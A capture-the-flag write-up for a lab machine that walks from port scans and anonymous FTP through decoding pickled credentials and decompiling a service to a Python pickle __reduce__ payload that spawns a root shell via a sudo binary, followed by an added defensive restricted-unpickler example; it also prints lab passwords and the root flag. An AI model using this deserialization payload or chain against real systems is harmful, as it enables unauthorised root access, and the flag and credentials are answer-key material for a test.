Port scanning

nmap --min-rate=10000 -p- 10.10.2.217
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-21 15:34 UTC
Nmap scan report for ip-10-10-12-153.eu-west-1.compute.internal (10.10.2.217)
Host is up (0.022s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
7321/tcp open swx
MAC Address: 02:AE:DB:BF:76:C3 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.79 seconds
nmap -sC -sT -sV -O -p21,22,7321 10.10.2.217
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-21 15:36 UTC
Nmap scan report for ip-10-10-12-153.eu-west-1.compute.internal (10.10.2.217)
Host is up (0.00039s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 17 May 15 2020 test.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.102.118
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 04d5759dc1405137734c423038b8d6df (RSA)
| 256 7f951ad7592f1906eac155ec58350c05 (ECDSA)
|_ 256 a51536921caa599b8ad8ea13c9c0ffb6 (ED25519)
7321/tcp open swx?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| Username: Password:
| NULL:
|_ Username:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 02:AE:DB:BF:76:C3 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.13
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.39 seconds

Getting a shell

FTP allows anonymous login.

ftp 10.10.2.217
Connected to 10.10.2.217.
220 (vsFTPd 3.0.3)
Name (10.10.2.217:mikannse): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls -a
229 Entering Extended Passive Mode (|||24251|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 May 15 2020 .
drwxr-xr-x 2 ftp ftp 4096 May 15 2020 ..
-rw-r--r-- 1 ftp ftp 7048 May 15 2020 .creds
-rw-r--r-- 1 ftp ftp 17 May 15 2020 test.txt

.creds is a blob of binary data; decoding it yields an unclear string like ssh_xxx. Following the room's hint, try deserializing it:

import pickle

# Deserialize the downloaded .creds blob (saved locally as download.dat)
with open('./download.dat', 'rb') as file:
    file_content = file.read()

result = pickle.loads(file_content)
print(result)

You get a pile of arrays; piecing them together slowly gives the user and password:

gherkin:p1ckl3s_@11_@r0und_th3_w0rld

These let you log in over SSH. The home directory contains a .pyc file, which can be decompiled:

scp gherkin@10.10.2.217:/home/gherkin/cmd_service.pyc .

Decompile it directly online at https://tool.lu/pyc/

It turns out to be the source of the service listening on port 7321, and near the top are a username and password:

from Crypto.Util.number import long_to_bytes

# The decompiled cmd_service.pyc stores the credentials as integers
username = long_to_bytes(1684630636)
password = long_to_bytes(0x6E337633725F405F64316C6C5F6D306D336E74)
print(username.decode())
print(password.decode())

Result: dill:n3v3r_@_d1ll_m0m3nt

nc 10.10.2.217 7321

Commands can be executed:

cp /home/dill/.ssh/id_rsa /tmp/key
chmod 777 /tmp/key
scp gherkin@10.10.2.217:/tmp/key .

Use the private key to log in over SSH.

Privilege escalation

sudo -l
Matching Defaults entries for dill on ubuntu-xenial:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dill may run the following commands on ubuntu-xenial:
(ALL : ALL) NOPASSWD: /opt/peak_hill_farm/peak_hill_farm

Running it prompts for a base64 string; following the room's deserialization hint, build a payload:

import pickle, os, base64

class SerializedPickle(object):
    # __reduce__ makes the unpickler call os.system("/bin/bash") on load
    def __reduce__(self):
        return (os.system, ("/bin/bash",))

payload = base64.b64encode(pickle.dumps(SerializedPickle()))
print(payload.decode())

Pasting it in gives a root shell.
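As an added defensive counterpoint (not code from the writeup or the room): both the .creds blob earlier and the peak_hill_farm binary here hand attacker-controlled bytes to pickle.loads, and a __reduce__ that names a callable is exactly what that lets through. The example below, standard library only, shows a restricted unpickler that refuses any global outside an allow-list, plus a pickletools-based triage that lists the globals a pickle would import without executing it; the gadget used is benign (it names print) so the demo never spawns a shell, and the sample data is constructed.

```python
import io
import pickle
import pickletools

# Globals a loader may resolve. Plain data pickles need none at all;
# a crafted __reduce__ needs one (e.g. os.system), so it gets refused.
SAFE_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves globals on the allow-list."""
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def referenced_globals(data: bytes):
    """Static triage: list the (module, name) globals a pickle would import,
    by walking its opcodes with pickletools instead of executing it."""
    found, strings = [], []
    for op, arg, _ in pickletools.genops(data):
        if op.name == "GLOBAL":            # protocols 0-3: arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":    # protocol 4+: module, name pushed first
            found.append((strings[-2], strings[-1]))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
    return found


class BenignGadget:
    """Same shape as the room's payload (a __reduce__ naming a callable),
    but the callable is print(), so loading it never spawns a shell."""
    def __reduce__(self):
        return (print, ("code ran during unpickling",))


def demo():
    # Constructed sample data, not the room's actual .creds content.
    plain = pickle.dumps({"user": "gherkin", "ports": [21, 22, 7321]})
    gadget = pickle.dumps(BenignGadget())
    try:
        safe_loads(gadget)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return safe_loads(plain), blocked, referenced_globals(gadget)
```

The static check is the one to run on a file like .creds before ever loading it: a pickle that is genuinely just data references no globals at all.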

This root.txt is sneaky, though: its filename has an odd character in front of it. You can log in as root over SSH and inspect it:

root@ubuntu-xenial:~# stat * 
File: ' root.txt '
Size: 33 Blocks: 8 IO Block: 4096 regular file
Device: ca01h/51713d Inode: 8094 Links: 1
Access: (0440/-r--r-----) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2020-05-18 23:10:25.296000000 +0000
Modify: 2020-05-15 18:38:19.003979890 +0000
Change: 2020-05-18 23:10:40.644000000 +0000
Birth: -
root@ubuntu-xenial:~# cat ' root.txt '
e88f0a01135c05cf0912cf4bc335ee28

Closing thoughts

A fairly easy room overall; basically all things I've already learned.